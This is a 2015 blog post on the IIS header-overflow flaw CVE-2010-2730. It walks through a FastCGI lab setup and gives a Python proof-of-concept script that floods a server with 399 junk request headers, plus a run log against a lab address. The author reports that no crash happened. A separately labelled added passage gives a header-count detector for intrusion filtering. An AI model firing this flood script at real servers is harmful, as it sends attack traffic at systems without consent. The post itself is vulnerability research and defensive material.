Saturday, February 28, 2015

CVE-2010-2730: Microsoft IIS Request Header Buffer Overflow Vulnerability

Writing a proof of concept based on information available on various sites.
Check Point describes the vulnerability as follows:

"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."
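The advisory above says the trigger is an "unexpected number of headers" in a single request. As an added example that is not part of this post, the script below shows the kind of check a WAF, reverse proxy or IDS in front of an unpatched server could apply: parse the head of the request, count the headers, and flag requests far above what a browser sends. The threshold MAX_HEADERS and the two sample requests are constructed assumptions, not values from IIS or the advisory; the flood sample only reproduces the header shape (My-Name1 .. My-Name399) so the detector has something realistic to look at.

```python
"""Flag HTTP requests that carry an unexpectedly large number of headers.

Added example (not the original post's code). Mimics the check a WAF or IDS
would apply in front of an unpatched IIS host: the quoted advisory says the
bug is triggered by an "unexpected number of headers", so a header count far
above normal browser traffic is a useful detection signal.  MAX_HEADERS is an
assumed threshold chosen for this example, not a value from IIS or MS10-065.
"""

MAX_HEADERS = 64  # assumption: real browsers send well under this many headers


def parse_request(raw):
    """Split a raw HTTP/1.x request into (request_line, [(name, value), ...]).

    Only the head of the request is examined (up to the first blank line).
    Obsolete line folding (a line starting with SP or HTAB) is appended to the
    previous header's value rather than counted as a new header.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        if not line:
            continue
        if line[0] in " \t" and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def header_count(raw):
    """Number of header fields in the request head."""
    return len(parse_request(raw)[1])


def inspect_request(raw, max_headers=MAX_HEADERS):
    """Describe the request and say whether it exceeds the header budget."""
    request_line, headers = parse_request(raw)
    names = [n for n, _ in headers]
    return {
        "request_line": request_line,
        "header_count": len(headers),
        "over_limit": len(headers) > max_headers,
        # many distinct, similarly named headers is the signature of a flood
        "unique_names": len(set(names)),
    }


def build_request(path, extra_headers):
    """Build a constructed sample GET request (not captured traffic)."""
    base = [
        ("Host", "192.0.2.10"),
        ("Accept", "text/html"),
        ("Accept-Language", "en-us"),
        ("Connection", "keep-alive"),
    ]
    lines = ["GET %s HTTP/1.1" % path]
    for name, value in base + extra_headers:
        lines.append("%s: %s" % (name, value))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("iso-8859-1")


# Constructed samples: a normal browser-style request and a header flood with
# the same shape the proof of concept on this page generates.
NORMAL_REQUEST = build_request("/phpinfo.php", [])
FLOOD_REQUEST = build_request(
    "/phpinfo.php",
    [("My-Name%d" % i, "junk%d" % i) for i in range(1, 400)],
)

if __name__ == "__main__":
    for label, req in (("normal", NORMAL_REQUEST), ("flood", FLOOD_REQUEST)):
        print(label, inspect_request(req))
```

The header count is computed before any body is read, so the check is cheap enough to run on every request; pairing it with a hard per-request header limit on the proxy (and, of course, the MS10-065 update referenced below) turns the detection into a mitigation.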

Configuring FastCGI for IIS 7.5
Browse to
    Control Panel -> Programs and Features 
click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and unchecking all the other checkboxes given below.


Install the Administrator pack for IIS 7.5. After installing the pack, click Start and type IIS; you will see Internet Information Services (IIS) Manager, and clicking it opens the window below.

Configure FastCGI as shown below

If you feel the configuration didn't go fine, you can configure and verify it using the CLI.
appcmd.exe is found at
%windir%\system32\inetsrv\


If the FastCGI installation is successful, accessing
http://localhost/phpinfo.cgi
should show the page below. I created the page phpinfo.php under
C:\Inetpub\wwwroot\
Make sure the directory has proper permissions.

Proof of Concept
#!/usr/bin/python

import sys
import urllib2

def main(all_args):
    print "in main"
    # expects exactly two arguments: target address and HTTP port
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port" % (all_args[0])
        sys.exit(1)
    # ordinary browser-like request headers
    headers = {"Host": all_args[1],
               "Accept": "text/html,application/xhtml+xml,application/xml",
               "Accept-Language": "en-us",
               "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
               "Keep-Alive": "115",
               "Connection": "keep-alive"}

    for k, v in headers.items():
        print (k, v)

    # add a large number of junk headers (My-Name1 .. My-Name399) so that the
    # request carries an unexpected header count
    print "Creating junk Request Headers"
    for i in range(1, 400):
        headers["My-Name" + str(i)] = "Praveen Darshanam" + str(i)

    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    # GET request (no body) carrying all of the headers above
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(response.read()))

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)
    main(sys.argv)

Usage
./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port
praveend@praveend-VirtualBox:~$
$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80
sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '192.168.56.110')
Creating junk Request Headers
url: http://192.168.56.110:80/phpinfo.php
Response Length =119639

Exploit Traffic


I didn't see any crash after sending multiple fake headers; not sure if I interpreted the vulnerability in the correct manner.

References
https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx
http://www.iis.net/configreference/system.webserver/fastcgi
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730
http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html
http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html
https://technet.microsoft.com/library/security/ms10-065